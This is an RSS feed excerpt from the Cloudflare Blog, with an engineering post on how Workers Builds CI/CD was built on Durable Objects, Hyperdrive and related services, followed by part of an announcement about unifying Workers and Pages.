
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Sat, 04 Apr 2026 13:31:05 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Workers Builds: integrated CI/CD built on the Workers platform]]></title>
            <link>https://blog.cloudflare.com/workers-builds-integrated-ci-cd-built-on-the-workers-platform/</link>
            <pubDate>Thu, 31 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Workers Builds, an integrated CI/CD pipeline for the Workers platform, recently launched in open beta. We walk through how we built this product on Cloudflare’s Developer Platform. ]]></description>
            <content:encoded><![CDATA[ <p>During 2024’s Birthday Week, we <a href="https://blog.cloudflare.com/builder-day-2024-announcements/#continuous-integration-and-delivery"><u>launched Workers Builds</u></a> in open beta — an integrated <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">Continuous Integration and Delivery (CI/CD) </a>workflow you can use to build and deploy everything from full-stack applications built with the most popular frameworks to simple static websites onto the Workers platform. With Workers Builds, you can connect a GitHub or GitLab repository to a Worker, and Cloudflare will automatically build and deploy your changes each time you push a commit.</p><p>Workers Builds is intended to bridge the gap between the developer experiences for Workers and Pages, the latter of which <a href="https://blog.cloudflare.com/cloudflare-pages/"><u>launched with an integrated CI/CD system in 2020</u></a>. As we continue to <a href="https://blog.cloudflare.com/pages-and-workers-are-converging-into-one-experience/"><u>merge the experiences of Pages and Workers</u></a>, we wanted to bring one of the best features of Pages to Workers: the ability to tie deployments to existing development workflows in GitHub and GitLab with minimal developer overhead. </p><p>In this post, we’re going to share how we built the Workers Builds system on Cloudflare’s Developer Platform, using <a href="https://developers.cloudflare.com/workers/"><u>Workers</u></a>, <a href="https://developers.cloudflare.com/durable-objects"><u>Durable Objects</u></a>, <a href="https://developers.cloudflare.com/hyperdrive"><u>Hyperdrive</u></a>, <a href="https://developers.cloudflare.com/logs/log-explorer/"><u>Workers Logs</u></a>, and <a href="https://developers.cloudflare.com/workers/configuration/smart-placement"><u>Smart Placement</u></a>.</p>
    <div>
      <h2>The design problem</h2>
      <a href="#the-design-problem">
        
      </a>
    </div>
    <p>The core problem for Workers Builds is how to pick up a commit from GitHub or GitLab and start a containerized job that can clone the repo, build the project, and deploy a Worker. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6n6UCIKAM4uAtWzsRBiS16/1c0b655b415afe375b6b153ada570357/BLOG-2594_2.png" />
          </figure><p>Pages solves a similar problem, and we were initially inclined to expand our existing architecture and tech stack, which includes a centralized configuration plane written in Go and running on Kubernetes. We also considered the ways in which the Workers ecosystem has evolved in the four years since Pages launched — we have since launched so many more tools built for use cases just like this! </p><p>The distributed nature of Workers offers some advantages over a centralized stack — we can spend less time configuring Kubernetes because Workers automatically handles failover and scaling. Ultimately, we decided to keep using what required no additional work to re-use from Pages (namely, the system for connecting GitHub/GitLab accounts to Cloudflare, and ingesting push events from them), and for the rest build out a new architecture on the Workers platform, with reliability and minimal latency in mind.</p>
    <div>
      <h2>The Workers Builds system</h2>
      <a href="#the-workers-builds-system">
        
      </a>
    </div>
    <p>We didn’t need to make any changes to the system that handles connections from GitHub/GitLab to Cloudflare and ingesting push events from them. That left us with two systems to build: the configuration plane for users to connect a Worker to a repo, and a build management system to run and monitor builds.</p>
    <div>
      <h3>Client Worker </h3>
      <a href="#client-worker">
        
      </a>
    </div>
    <p>We can begin with our configuration plane, which consists of a simple Client Worker that implements a RESTful API (using <a href="https://hono.dev/docs/getting-started/cloudflare-workers"><u>Hono</u></a>) and connects to a PostgreSQL database. It’s in this database that we store build configurations for our users, and through this Worker that users can view and manage their builds. </p><p>We use a <a href="https://developers.cloudflare.com/hyperdrive/"><u>Hyperdrive binding</u></a> to connect to our database <a href="https://developers.cloudflare.com/hyperdrive/configuration/connect-to-private-database"><u>securely over Cloudflare Access</u></a> (which also manages connection pooling and query caching).</p><p>We considered a more distributed data model (like <a href="https://developers.cloudflare.com/d1/"><u>D1</u></a>, sharded by account), but ultimately decided that keeping our database in a single datacenter better fit our use case. The Workers Builds data model is relational — Workers belong to Cloudflare Accounts, and Builds belong to Workers — and build metadata must be consistent in order to properly manage build queues. We chose to keep our failover-ready database in a centralized datacenter and take advantage of two other Workers products, Smart Placement and Hyperdrive, in order to keep the benefits of a distributed control plane. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33eYqRr5LXKbAvfP8RR7X7/b82858c39b9755c6e056577c9449b00f/BLOG-2594_3.png" />
          </figure><p>Everything that you see in the Cloudflare Dashboard related to Workers Builds is served by this Worker. </p>
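<p>For illustration, the Hyperdrive binding the Client Worker uses might be declared in <code>wrangler.toml</code> like this (a simplified sketch — the binding name and ID are placeholders, not our production configuration):</p>

```toml
# Hypothetical wrangler.toml fragment: a Hyperdrive binding the Worker can use
# to reach the PostgreSQL database through connection pooling and caching.
[[hyperdrive]]
binding = "HYPERDRIVE"
id = "<your-hyperdrive-config-id>"
```

<p>Inside the Worker, <code>env.HYPERDRIVE.connectionString</code> can then be handed to a standard Postgres client, so application code is unaware that pooling and caching sit in between.</p>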
    <div>
      <h3>Build Management Worker</h3>
      <a href="#build-management-worker">
        
      </a>
    </div>
    <p>The more challenging problem we faced was how to run and manage user builds effectively. We wanted to support the same experience that we had achieved with Pages, which led to these key requirements:</p><ol><li><p>Builds should be initiated with minimal latency.</p></li><li><p>The status of a build should be tracked and displayed through its entire lifecycle, starting when a user pushes a commit.</p></li><li><p>Customer build logs should be stored in a secure, private, and long-lived way.</p></li></ol><p>To solve these problems, we leaned heavily on <a href="https://developers.cloudflare.com/durable-objects/"><u>Durable Objects</u></a> (DO). </p><p>We created a Build Management Worker with two DO classes: a Scheduler class to manage the scheduling of builds, and a class called BuildBuddy to manage individual builds. We designed the system this way for efficiency and scalability: because each build is assigned its own build manager DO, its operation never blocks other builds or the scheduler, meaning we can start builds with minimal latency. Below, we dive into each of these Durable Object classes.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6RUDJI7IYIlzcX4qjF9EYY/7e959b7a4489a41d275d74d634389f31/BLOG-2594_4.png" />
          </figure>
    <div>
      <h4>Scheduler DO</h4>
      <a href="#scheduler-do">
        
      </a>
    </div>
    <p>The Scheduler DO class is relatively simple. Using <a href="https://developers.cloudflare.com/durable-objects/api/alarms/"><u>Durable Objects Alarms</u></a>, it is triggered every second to pull up a list of user build configurations that are ready to be started. For each of those builds, the Scheduler creates an instance of our other DO Class, the Build Buddy. </p>
            <pre><code>import { DurableObject } from 'cloudflare:workers'
// p-queue limits how many builds we start concurrently
import PQueue from 'p-queue'

export class BuildScheduler extends DurableObject&lt;Bindings&gt; {
    // The DO alarm handler is called every second to fetch builds
    async alarm(): Promise&lt;void&gt; {
        // Set the alarm to run again in 1 second
        await this.updateAlarm()

        const builds = await this.getBuildsToSchedule()
        await this.scheduleBuilds(builds)
    }

    async scheduleBuilds(builds: Builds[]): Promise&lt;void&gt; {
        // Nothing to do if there are no builds to schedule
        if (builds.length === 0) return

        const queue = new PQueue({ concurrency: 6 })
        // Begin running builds
        builds.forEach((build) =&gt;
            queue.add(async () =&gt; {
                // The BuildBuddy is another DO described more in the next section!
                const bb = getBuildBuddy(this.env, build.build_id)
                await bb.startBuild(build)
            })
        )

        await queue.onIdle()
    }

    async getBuildsToSchedule(): Promise&lt;Builds[]&gt; {
        // returns list of builds to schedule
    }

    async updateAlarm(): Promise&lt;void&gt; {
        // To avoid running multiple alarms at once, we only set the next alarm
        // if there isn't already one set.
        const existingAlarm = await this.ctx.storage.getAlarm()
        if (existingAlarm === null) {
            await this.ctx.storage.setAlarm(Date.now() + 1000)
        }
    }
}
</code></pre>
            
    <div>
      <h4>Build Buddy DO</h4>
      <a href="#build-buddy-do">
        
      </a>
    </div>
    <p>The Build Buddy DO class is what we use to manage each individual build from the time it begins initializing to when it is stopped. Every build has a buddy for life!</p><p>Upon creation of a Build Buddy DO instance, the Scheduler immediately calls <code>startBuild()</code> on the instance. The <code>startBuild()</code> method is responsible for fetching all metadata and secrets needed to run a build, and then kicking off a build on Cloudflare’s container platform (<a href="https://blog.cloudflare.com/container-platform-preview/"><u>not public yet, but coming soon</u></a>!). </p><p>As the containerized build runs, it reports back to the Build Buddy, sending status updates and logs for the Build Buddy to deal with. </p>
    <div>
      <h5>Build status</h5>
      <a href="#build-status">
        
      </a>
    </div>
    <p>As a build progresses, it reports its own status back to Build Buddy, sending updates when it has finished initializing, has completed successfully, or been terminated by the user. The Build Buddy is responsible for handling this incoming information from the containerized build, writing status updates to the database (via a Hyperdrive binding) so that users can see the status of their build in the Cloudflare dashboard.</p>
    <div>
      <h5>Build logs</h5>
      <a href="#build-logs">
        
      </a>
    </div>
    <p>A running build generates output logs that are important to store and surface to the user. The containerized build flushes these logs to the Build Buddy every second, which, in turn, stores those logs in <a href="https://developers.cloudflare.com/durable-objects/api/storage-api/"><u>DO storage</u></a>. </p><p>The decision to use Durable Object storage here makes it easy to multicast logs to multiple clients efficiently, and allows us to use the same API for both streaming logs and viewing historical logs. </p><p>// build-management-app.ts</p>
            <pre><code>// The Build Management Worker's Hono app, which receives status updates
// and logs from containerized builds
const app = new Hono&lt;HonoContext&gt;()
    .post(
        '/api/builds/:build_uuid/status',
        async (c) =&gt; {
            const buildStatus = await c.req.json()

            // fetch build metadata
            const build = ...

            const bb = getBuildBuddy(c.env, build.build_id)
            return await bb.handleStatusUpdate(build, buildStatus)
        }
    )
    .post(
        '/api/builds/:build_uuid/logs',
        async (c) =&gt; {
            const logs = await c.req.json()

            // fetch build metadata
            const build = ...

            const bb = getBuildBuddy(c.env, build.build_id)
            return await bb.addLogLines(logs.lines)
        }
    )

export default {
    fetch: app.fetch
}
</code></pre>
            <p>// build-buddy.ts</p>
            <pre><code>import { DurableObject } from 'cloudflare:workers'

export class BuildBuddy extends DurableObject {
    compute: ComputeClient

    constructor(ctx: DurableObjectState, env: Bindings) {
        super(ctx, env)
        this.compute = new ComputeClient({
            // ...
        })
    }

    // The Scheduler DO calls startBuild upon creating a BuildBuddy instance.
    // We intentionally don't await the async work, so the Scheduler isn't blocked.
    startBuild(build: Build): void {
        void this.startBuildAsync(build)
    }

    async startBuildAsync(build: Build): Promise&lt;void&gt; {
        // fetch all metadata needed to run the build, including
        // environment variables, secrets, build tokens, repo credentials,
        // build image URI, etc.
        // ...

        // start a containerized build
        const computeBuild = await this.compute.createBuild({
            // ...
        })
    }

    // The Build Management Worker calls handleStatusUpdate when it receives an update
    // from the containerized build
    async handleStatusUpdate(
        build: Build,
        buildStatusUpdatePayload: Payload
    ): Promise&lt;void&gt; {
        // Write status updates to the database
    }

    // The Build Management Worker calls addLogLines when it receives flushed logs
    // from the containerized build
    async addLogLines(logs: LogLines): Promise&lt;void&gt; {
        // Generate nextLogsKey to store logs under
        const nextLogsKey = ...
        await this.ctx.storage.put(nextLogsKey, logs)
    }

    // The Client Worker can call methods on a Build Buddy via RPC, using a service binding to the Build Management Worker.
    // The getLogs method retrieves logs for the user, and the cancelBuild method forwards a request from the user to terminate a build.
    async getLogs(cursor?: string) {
        const decodedCursor = cursor !== undefined ? decodeLogsCursor(cursor) : undefined
        // read the stored log lines back out of DO storage (implementation elided)
        return await this.getLogsFromStorage(decodedCursor)
    }

    async cancelBuild(compute_id: string, build_id: number): Promise&lt;void&gt; {
        await this.terminateBuild(build_id, compute_id)
    }

    async terminateBuild(build_id: number, compute_id: string): Promise&lt;void&gt; {
        await this.compute.stopBuild(compute_id)
    }
}

export function getBuildBuddy(
    env: Pick&lt;Bindings, 'BUILD_BUDDY'&gt;,
    build_id: number
): DurableObjectStub&lt;BuildBuddy&gt; {
    const id = env.BUILD_BUDDY.idFromName(build_id.toString())
    return env.BUILD_BUDDY.get(id)
}
</code></pre>
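            <p>To make the log-storage pattern above concrete, here is a minimal sketch (our own illustration — the key scheme and names are hypothetical, not the production code). Durable Object storage lists keys in lexicographic order, so zero-padding a sequence number keeps log batches in write order, and a cursor is just the last key a client has seen:</p>

```typescript
// Hypothetical helpers for storing flushed log batches in DO storage.
// Key format and padding width are illustrative.
const KEY_WIDTH = 12

// Zero-pad the batch sequence number so keys sort in write order:
// "logs:000000000002" sorts before "logs:000000000010"
function nextLogsKey(sequence: number): string {
    return `logs:${sequence.toString().padStart(KEY_WIDTH, '0')}`
}

// A cursor is the last key the client has seen, base64url-encoded so it is
// opaque and safe to put in a URL.
function encodeLogsCursor(lastKey: string): string {
    return Buffer.from(lastKey, 'utf8').toString('base64url')
}

function decodeLogsCursor(cursor: string): string {
    return Buffer.from(cursor, 'base64url').toString('utf8')
}
```

<p>The same key scheme serves both modes mentioned above: streaming clients repeatedly list keys greater than their cursor, while historical reads list from the beginning.</p>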
            
    <div>
      <h5>Alarms</h5>
      <a href="#alarms">
        
      </a>
    </div>
    <p>We utilize <a href="https://developers.cloudflare.com/durable-objects/api/alarms/"><u>alarms</u></a> in the Build Buddy to check that a build has a healthy startup and to terminate any builds that run longer than 20 minutes. </p>
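    <p>As an illustrative sketch (our own, with hypothetical names — not the production code), the watchdog decision the alarm handler makes each time it fires can be reduced to a pure check:</p>

```typescript
// Hypothetical timeout check for a Build Buddy watchdog alarm.
const BUILD_TIMEOUT_MS = 20 * 60 * 1000 // 20 minutes

function buildHasTimedOut(startedAtMs: number, nowMs: number): boolean {
    return nowMs - startedAtMs >= BUILD_TIMEOUT_MS
}
```

<p>When the check returns true, the alarm handler would terminate the containerized build and stop rescheduling itself; otherwise it sets the next alarm and waits.</p>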
    <div>
      <h2>How else have we leveraged the Developer Platform?</h2>
      <a href="#how-else-have-we-leveraged-the-developer-platform">
        
      </a>
    </div>
    <p>Now that we've gone over the core behavior of the Workers Builds control plane, we'd like to detail a few other features of the Workers platform that we use to improve performance, monitor system health, and troubleshoot customer issues.</p>
    <div>
      <h3>Smart Placement and location hints</h3>
      <a href="#smart-placement-and-location-hints">
        
      </a>
    </div>
    <p>While our control plane is distributed in the sense that it can run across multiple datacenters, we want most requests to be served from locations close to our primary database in the western US to reduce latency.</p><p>While a build is running, Build Buddy, a Durable Object, is continuously writing status updates to our database. For the Client and the Build Management API Workers, we enabled <a href="https://developers.cloudflare.com/workers/configuration/smart-placement/"><u>Smart Placement</u></a> with <a href="https://developers.cloudflare.com/durable-objects/reference/data-location/#provide-a-location-hint"><u>location hints</u></a> to ensure requests run close to the database.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4hhFLpYizLZ6cyu4h80YL8/40af67320a6bf44f375d6055b2997a99/BLOG-2594_5.png" />
          </figure><p>This graph shows the reduction in round trip time (RTT) observed for our Worker with Smart Placement turned on. </p>
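<p>For reference, enabling Smart Placement is a small configuration change. A hypothetical <code>wrangler.toml</code> fragment (the production configuration may differ):</p>

```toml
# Hypothetical wrangler.toml fragment: let Cloudflare place the Worker near
# the backend it talks to most (our database, in this case).
[placement]
mode = "smart"
```

<p>For Durable Objects, a location hint can similarly be supplied when creating a stub, e.g. <code>env.BUILD_BUDDY.get(id, { locationHint: 'wnam' })</code> for western North America.</p>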
    <div>
      <h3>Workers Logs</h3>
      <a href="#workers-logs">
        
      </a>
    </div>
    <p>We needed a logging tool that lets us aggregate and search persistent operational logs from our Workers to help identify and troubleshoot issues. We worked with the Workers Observability team to become early adopters of <a href="https://developers.cloudflare.com/workers/observability/logs/workers-logs"><u>Workers Logs</u></a>.</p><p>Workers Logs worked out of the box, giving us fast, easy-to-use logs directly within the Cloudflare dashboard. To improve our ability to search logs, we created a <a href="https://www.npmjs.com/package/workers-tagged-logger"><u>tagging library</u></a> that lets us easily attach metadata, like the git tag of the deployed Worker a log comes from, so we can filter logs by release.</p><p>See the shortened example below of how we handle and log errors on the Client Worker. </p><p>// client-worker-app.ts</p>
            <pre><code>// The Client Worker is a RESTful API built with Hono
const app = new Hono&lt;HonoContext&gt;()
   // This is from the workers-tagged-logger library - first we register the logger
   .use(useWorkersLogger('client-worker-app'))
   // If any error happens during execution, this middleware will ensure we log the error
   .onError(useOnError)
   // routes
   .get(
       '/apiv4/builds',
       async (c) =&gt; {
           const { ids } = c.req.query()
           return await getBuildsByIds(c, ids)
       }
   )


function useOnError(e: Error, c: Context&lt;HonoContext&gt;): Response {
    // Set the release identifier on the error
    logger.setTags({ release: c.env.GIT_TAG })

    // Write a log at level 'error'. Can also log 'info', 'log', 'warn', and 'debug'
    logger.error(e)
    return c.json(internal_error.toJSON(), internal_error.statusCode)
}
</code></pre>
            <p>This setup produces log messages like the sample below from our Workers Logs dashboard. You can see the release tag set on the log.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gfd725NCFNrhlDt3gK515/90138c159285e91535a986266918be13/BLOG-2594_6.png" />
          </figure><p>We can get a better sense of the impact of the error by adding filters to the Workers Logs view, as shown below. We are able to filter on any of the fields since we’re <a href="https://developers.cloudflare.com/workers/observability/logs/workers-logs#logging-structured-json-objects"><u>logging with structured JSON</u></a>.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6XqXINluVzzyHd4O17JsnZ/0ac714792a4d21623b4a875291ae0ad0/BLOG-2594_7.png" />
          </figure>
    <div>
      <h3>R2</h3>
      <a href="#r2">
        
      </a>
    </div>
    <p>Coming soon to Workers Builds is build caching, used to store artifacts of a build for subsequent builds to reuse, such as package dependencies and build outputs. Build caching can speed up customer builds by avoiding the need to redownload dependencies from NPM or to rebuild projects from scratch. The cache itself will be backed by <a href="https://www.cloudflare.com/developer-platform/products/r2/">R2 storage</a>. </p>
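    <p>As a sketch of how such a cache might be keyed (our own illustration; the shipped design may differ), a deterministic R2 object key can be derived from a hash of the project's lockfile, so any change to dependencies naturally invalidates the cache:</p>

```typescript
import { createHash } from 'node:crypto'

// Hypothetical cache-key scheme for build caching backed by R2.
function buildCacheKey(projectId: string, lockfileContents: string): string {
    const digest = createHash('sha256').update(lockfileContents).digest('hex')
    // Namespace by project so projects never share cache entries
    return `cache/${projectId}/${digest.slice(0, 16)}`
}
```

<p>A build with an unchanged lockfile maps to the same key and gets a cache hit; a dependency bump produces a fresh key and a cold build.</p>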
    <div>
      <h3>Testing</h3>
      <a href="#testing">
        
      </a>
    </div>
    <p>We were able to build up a great testing story using <a href="https://blog.cloudflare.com/workers-vitest-integration/"><u>Vitest and workerd</u></a> — unit tests, cross-worker integration tests, the works. In the example below, we make use of the <code>runInDurableObject</code> stub from <code>cloudflare:test</code> to test instance methods on the Scheduler DO directly.</p><p>// scheduler.spec.ts</p>
            <pre><code>import { env, runInDurableObject } from 'cloudflare:test'
import { expect, test } from 'vitest'
import { BuildScheduler } from './scheduler'


test('getBuildsToSchedule() runs a queued build', async () =&gt; {
   // Our test harness creates a single build for our scheduler to pick up
   const { build } = await harness.createBuild()


   // We create a scheduler DO instance
   const id = env.BUILD_SCHEDULER.idFromName(crypto.randomUUID())
   const stub = env.BUILD_SCHEDULER.get(id)
    await runInDurableObject(stub, async (instance: BuildScheduler) =&gt; {
        expect(instance).toBeInstanceOf(BuildScheduler)

        // We check that the scheduler picks up 1 build
        const builds = await instance.getBuildsToSchedule()
        expect(builds.length).toBe(1)

        // We start the build, which should mark it as running
        await instance.scheduleBuilds(builds)
    })


   // Check that there are no more builds to schedule
   const queuedBuilds = ...
   expect(queuedBuilds.length).toBe(0)
})
</code></pre>
            <p>We use <code>SELF.fetch()</code> from <code>cloudflare:test</code> to run integration tests on our Client Worker, as shown below. This integration test covers our Hono endpoint and database queries made by the Client Worker in retrieving the metadata of a build.</p><p>// builds_api.test.ts</p>
            <pre><code>import { env, SELF } from 'cloudflare:test'
import { expect, it } from 'vitest'

it('correctly selects a single build', async () =&gt; {
    // Our test harness creates a randomized build to test with
    const { build } = await harness.createBuild()

    // We send a request to the Client Worker itself to fetch the build metadata
    const getBuild = await SELF.fetch(
        `https://example.com/builds/${build.build_uuid}`,
        {
            method: 'GET',
            headers: new Headers({
                Authorization: `Bearer JWT`,
                'content-type': 'application/json',
            }),
        }
    )

    // We expect to receive a 200 response from our request and for the
    // build metadata returned to match that of the random build that we created
    expect(getBuild.status).toBe(200)
    const getBuildV4Resp = await getBuild.json()
    const buildResp = getBuildV4Resp.result
    expect(buildResp).toBeTruthy()
    expect(buildResp).toEqual(build)
})
</code></pre>
            <p>These tests run on the same runtime that Workers run on in production, meaning we have greater confidence that any code changes will behave as expected when they go live. </p>
    <div>
      <h3>Analytics</h3>
      <a href="#analytics">
        
      </a>
    </div>
    <p>We use the technology underlying the <a href="https://developers.cloudflare.com/analytics/analytics-engine/"><u>Workers Analytics Engine</u></a> to collect all of the metrics for our system. We set up <a href="https://developers.cloudflare.com/analytics/analytics-engine/grafana/"><u>Grafana</u></a> dashboards to display these metrics. </p>
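    <p>For example, a build-completion metric written to Analytics Engine takes the shape below (the field values and helper are illustrative, not our production schema): <code>blobs</code> carry low-cardinality string dimensions, <code>doubles</code> carry numeric values, and <code>indexes</code> set the sampling key.</p>

```typescript
// Hypothetical data point for a completed build, matching the shape accepted
// by Workers Analytics Engine's writeDataPoint().
interface BuildDataPoint {
    blobs: string[]
    doubles: number[]
    indexes: string[]
}

function buildCompletedDataPoint(
    accountId: string,
    status: 'success' | 'failed' | 'cancelled',
    durationMs: number
): BuildDataPoint {
    return {
        blobs: [status],       // dimension to group by in Grafana
        doubles: [durationMs], // numeric value to chart
        indexes: [accountId],  // sampling key
    }
}
```

<p>A Worker with an Analytics Engine binding would then pass this object to the binding's <code>writeDataPoint()</code> method, and the Grafana dashboards query the resulting dataset over SQL.</p>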
    <div>
      <h3>JavaScript-native RPC</h3>
      <a href="#javascript-native-rpc">
        
      </a>
    </div>
    <p><a href="https://blog.cloudflare.com/javascript-native-rpc/"><u>JavaScript-native RPC</u></a> was added to Workers in April of 2024, and it’s pretty magical. In the scheduler code example above, we call <code>startBuild()</code> on the BuildBuddy DO from the Scheduler DO. Without RPC, we would need to stand up routes on the BuildBuddy <code>fetch()</code> handler for the Scheduler to trigger with a fetch request. With RPC, there is almost no boilerplate — all we need to do is call a method on a class. </p>
            <pre><code>const bb = getBuildBuddy(this.env, build.build_id)


// Starting a build without RPC 😢
await bb.fetch('http://do/api/start_build', {
    method: 'POST',
    body: JSON.stringify(build),
})


// Starting a build with RPC 😸
await bb.startBuild(build)
</code></pre>
            
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>By using Workers and Durable Objects, we were able to build a complex and distributed system that is easy to understand and is easily scalable. </p><p>It’s been a blast for our team to build on top of the very platform that we work on, something that would have been much harder to achieve on Workers just a few years ago. We believe in being Customer Zero for our own products — to identify pain points firsthand and to continuously improve the developer experience by applying them to our own use cases. It was fulfilling to have our needs as developers met by other teams and then see those tools quickly become available to the rest of the world — we were collaborators and internal testers for Workers Logs and private network support for Hyperdrive (both released on Birthday Week), and the soon to be released container platform.</p><p>Opportunities to build complex applications on the Developer Platform have increased in recent years as the platform has matured and expanded product offerings for more use cases. We hope that Workers Builds will be yet another tool in the Workers toolbox that enables developers to spend less time thinking about configuration and more time writing code. </p><p>Want to try it out? Check out the <a href="https://developers.cloudflare.com/workers/ci-cd/builds/"><u>docs</u></a> to learn more about how to deploy your first project with Workers Builds.</p> ]]></content:encoded>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <guid isPermaLink="false">6uKjGQLUKCb33wGIcOQE1Y</guid>
            <dc:creator>Serena Shah-Simpson</dc:creator>
            <dc:creator>Jacob Hands</dc:creator>
            <dc:creator>Natalie Rogers</dc:creator>
        </item>
        <item>
            <title><![CDATA[Bringing a unified developer experience to Cloudflare Workers and Pages]]></title>
            <link>https://blog.cloudflare.com/pages-and-workers-are-converging-into-one-experience/</link>
            <pubDate>Wed, 17 May 2023 13:00:48 GMT</pubDate>
            <description><![CDATA[ Today we’re excited to announce that over the next year we will be working to bring together the best traits and attributes you know and love from each product into one powerful platform!  ]]></description>
            <content:encoded><![CDATA[
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PeofAYkofLOlbvWxKSbyp/0103898bf22da7dbe8e70e7705f32d43/image4-13.png" />
            
            </figure><p>Today, we’re thrilled to announce that Pages and Workers will be joining forces into one singular product experience!</p><p>We’ve all been there. In a surge of creativity, you visualize in your head the application you want to build so clearly with the pieces all fitting together – maybe a server side rendered frontend and an SQLite database for your backend. You head to your computer with the wheels spinning. You know you can build it, you just need the right tools. You log in to your Cloudflare dashboard, but then you’re faced with an incredibly difficult decision:</p><p><i>Cloudflare Workers or Pages?</i></p><p>Both seem so similar at a glance but also different in the details, so which one is going to make your idea become a reality? What if you choose the wrong one? What are the tradeoffs between the two? These are questions our users should never have to think about, but the reality is, they often do. Speaking with our wide community of users and customers, we hear it ourselves! Decision paralysis hits hard when choosing between Pages and Workers with both products made to build out serverless applications.</p><p>In short, we don’t want this for our users — especially when you’re on the verge of a great idea – no, a big idea. That’s why we’re excited to show off the first milestone towards bringing together the best of both beloved products — Workers and Pages into <b>one powerful development platform!</b> This is the beginning of the journey towards a shared fate between the two products, so we wanted to take the opportunity to tell you why we were doing this, what you can use today, and what’s next.</p>
    <div>
      <h2>More on the “why”</h2>
      <a href="#more-on-the-why">
        
      </a>
    </div>
    <p>The relationship between Pages and Workers has always been intertwined. Up until today, we always looked at the two as siblings — each having their own distinct characteristics but both allowing their respective users to <a href="https://www.cloudflare.com/developer-platform/solutions/hosting/">build rich and powerful applications</a>. Each product targeted its own set of use cases.</p><p>Workers first started as a way to extend our <a href="https://www.cloudflare.com/learning/cdn/what-is-a-cdn/">CDN</a> and then expanded into a highly configurable general purpose compute platform. Pages first started as a static web hosting platform and then expanded into <a href="https://www.cloudflare.com/learning/performance/what-is-jamstack/">Jamstack</a> territory. Over time, Pages began acquiring more of Workers' powerful compute features, while Workers began adopting the rich developer features introduced by Pages. The lines between these two products blurred, making it difficult for our users to understand the differences and pick the right product for their application needs.</p><p>We know we can do better to help alleviate this decision paralysis and help you move fast throughout your development experience.</p>
    <div>
      <h2>Cool, but what do you mean?</h2>
      <a href="#cool-but-what-do-you-mean">
        
      </a>
    </div>
    <p>Instead of being forced to make tradeoffs between these two products, we want to bring you the best of both worlds: a single development platform that has both powerful compute and superfast static asset hosting – that seamlessly integrates with our portfolio of storage products like <a href="https://www.cloudflare.com/developer-platform/r2/">R2</a>, Queues, D1, and others, and provides you with rich tooling like <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">CI/CD</a>, git-ops workflows, live previews, and flexible environment configurations.</p>
    <div>
      <h3>All the details in one place</h3>
      <a href="#all-the-details-in-one-place">
        
      </a>
    </div>
    <p>Today, a lot of our developers use both Pages and Workers to build pieces of their applications. However, they still live in separate parts of the Cloudflare dashboard and don’t always translate from one to the other, making it difficult to combine and keep track of your app’s stack. While we’re still vision-boarding the look and feel, we’re planning a world where users have the ability to manage all of their applications in one central place.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ZPV9OB9b2zjePkxRGefek/57cedd3e2ee1d701bdd8aca2334dd134/image1-44.png" />
            
            </figure><p>No more scrambling all over the dashboard to find the pieces of your application – you’ll have all the information you need about a project right at your fingertips.</p>
    <div>
      <h3>Primitives</h3>
      <a href="#primitives">
        
      </a>
    </div>
    <p>With Pages and Workers converging, we’ll also be redefining the concept of a “project”, introducing a new blank canvas of possibilities to plug and play. Within a project, you will be able to add (1) static assets, (2) serverless functions (Workers), (3) resources, or (4) any combination of the three.</p><p>To unlock the full potential of your application, we’re exploring project capabilities that allow you to auto-provision and directly integrate with resources like KV, Durable Objects, R2, and D1. More importantly, with all of these primitives on a single project, you'll be able to safely perform rollbacks and previews, as we'll keep the versions of your assets, functions, and resources in sync with every deployment. No need to worry about any of them becoming stale on your next deployment.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/74kTM29cuEOsePnmglreAA/fd4c9e7c9a62aad15c07dd7bf2ef3430/image5-8.png" />
            
            </figure>
    <div>
      <h3>Deployments</h3>
      <a href="#deployments">
        
      </a>
    </div>
    <p>One of Pages’ most notable qualities is its git-ops centered deployments. In our converged world, you’ll be able to optionally connect, build and deploy git repos that contain any combination of static assets, serverless functions and bindings to resources, as well as take advantage of the same high-performance CI system that exists in Pages today.</p><p>Like Pages, you will be able to preview deployments of your project with unique URLs protected by Cloudflare Access, available in your PRs or via Wrangler command. Because we know that great ideas take lots of vetting before the big release, we’ll also have a first-class concept of environments to enable testing in different setups.</p>
    <div>
      <h3>Local development</h3>
      <a href="#local-development">
        
      </a>
    </div>
    <p>Arguably one of the most important parts to consider is our local development story in a post-converged world. That developer experience should converge just as the products do. In the future, as you work with our Wrangler CLI, you can expect a unified and predictable set of commands to use on your project – e.g. a simple <code>wrangler dev</code> and <code>wrangler deploy</code>. Using a configuration file that applies to your entire project along with all of its components, you can have the confidence that your command will act on the entire project – not just pieces of it!</p>
    <div>
      <h2>What are the benefits?</h2>
      <a href="#what-are-the-benefits">
        
      </a>
    </div>
